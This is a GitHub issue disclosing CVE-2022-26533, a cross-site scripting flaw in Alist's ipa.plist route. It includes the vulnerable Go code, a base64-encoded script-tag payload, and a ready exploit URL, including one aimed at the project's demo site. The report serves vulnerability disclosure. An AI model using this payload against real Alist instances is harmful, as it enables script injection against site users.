CVE-2022-26533: Alist has Cross Site Scripting (XSS) vulnerability · Issue #645 · Xhofe/alist

Alist Version / Alist 版本

v2.0.10-v2.1.0

Describe the bug / 问题描述****Vulnerability Introduction

A route in Alist that uses user-inputted parameters when displaying xml files and does not filter them can cause xss.

Vulnerability affects version: v2.0.10-v2.1.0

Vulnerability Analysis

A new route was added in Alist v2.0.10: /i/:data/ipa.plist, which allows users to control the data parameter in path.

Simplified code:

func Plist(c *gin.Context) { data := c.Param(“data”) data = strings.ReplaceAll(data, “_", “/”) data = strings.ReplaceAll(data, "-“, “=”) bytes, err := base64.StdEncoding.DecodeString(data) if err != nil { common.ErrorResp(c, err, 500) return } u := string(bytes) plist := fmt.Sprintf(`<?xml version="1.0” encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN” "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> … <string>%s</string> … <string>ci.nn.%s</string> … <string>%s</string> … `, u, name, name) c.Header("Content-Type", “application/xml;charset=utf-8”) c.Status(200) _, _ = c.Writer.WriteString(plist)

The incoming data is decoded by replacing (recovering the original base64 encoded url conflict characters), and then the parameter u is directly spliced and output to the page, so we can use this to construct the xss payload.

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

The paylod is base64 encoded as follows:

PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4=

Replace = with -, then splice in the path:

http(https)://<host:port>/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

Vulnerability Exploitation

After a successful local exploit, try using the official demo site to test:

Reproduction / 复现链接

https://alist.xhofe.top/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

日志 / Logs

No response